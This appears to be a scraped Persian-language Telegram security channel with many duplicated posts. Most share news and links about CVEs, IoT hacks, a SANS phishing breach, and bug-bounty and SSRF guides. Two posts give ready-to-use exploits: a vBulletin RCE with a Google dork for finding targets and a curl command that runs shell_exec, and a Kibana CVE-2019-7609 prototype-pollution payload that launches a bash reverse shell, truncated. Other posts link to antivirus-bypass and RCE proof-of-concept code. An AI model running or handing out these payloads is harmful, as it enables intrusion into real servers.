تیم امنیتی Checkpoint آسیب پذیری جدیدی را در پردازنده های Qualcomm کشف کرده است که بیش از یک میلیارد دستگاه تلفن همراه را در معرض خطر قرار میدهد.
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.
شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209
https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/
#news
#android
@sec_nerd
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.
شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209
https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/
#news
#android
@sec_nerd
نفوذ به شبکه از طریق یک لامپ!
https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/
#network #pentest
#iot
@sec_nerd
https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/
#network #pentest
#iot
@sec_nerd
نفوذ به مرسدس بنز و در دست گرفتن کنترل آن در کنفرانس بلک هت ۲۰۲۰
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf
#iot #blackhat
#pentest
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Exploiting Android Messengers with WebRTC: CVE-2020-6514 - CVE-2020-6831 - CVE-2020-6389 - CVE-2020-6387.
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html
Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html
Part 3 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-3.html
#android
#webrtc
@sec_nerd
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
یکی از کارکنان شرکت SANS هک شد!
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.
این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.
شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.
https://www.sans.org/dataincident2020
#sans
#breach #news
@sec_nerd
www.sans.org
SANS Institute
Computer security training, certification and free resources. We specialize in computer/network security, digital forensics, application security and IT audit.
CVE-2019-7609(kibana RCE) on right way by python2 scripts
- URI
/api/timelion/run
-Payload
{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >
https://github.com/kisec/CVE-2019-7609
#kibana
#rce
@sec_nerd
- URI
/api/timelion/run
-Payload
{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >
https://github.com/kisec/CVE-2019-7609
#kibana
#rce
@sec_nerd
همه چیز در خصوص SSRF
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
https://www.zixem.altervista.org/SQLi/
https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4
چند چالش sql injection به همراه راه حل
#sqli #web #pentest
@sec_nerd
https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4
چند چالش sql injection به همراه راه حل
#sqli #web #pentest
@sec_nerd
Medium
Union SQLi Challenges (Zixem Write-up)
I’ve always avoided learning more about SQL Injections, since they’ve always seemed like quite a daunting part of Infosec. Because of this…
دور زدن آنتی ویروس با استفاده از لودر 64 بیتی متاسپلویت
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
#msf
#windows
#pentest
@sec_nerd
https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
#msf
#windows
#pentest
@sec_nerd
اجرای دستور از راه دور بر روی Pulse secure ssl vpn
CVE-2020-8218
https://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py
#rce
#pulse
#network
@sec_nerd
CVE-2020-8218
https://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py
#rce
#pulse
#network
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
اینجا یاد میگیرید چطور FUFF و burpsuite رو با هم ترکیب کنید
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd
https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242
#fuff
#fuzz
#burpsuite
@sec_nerd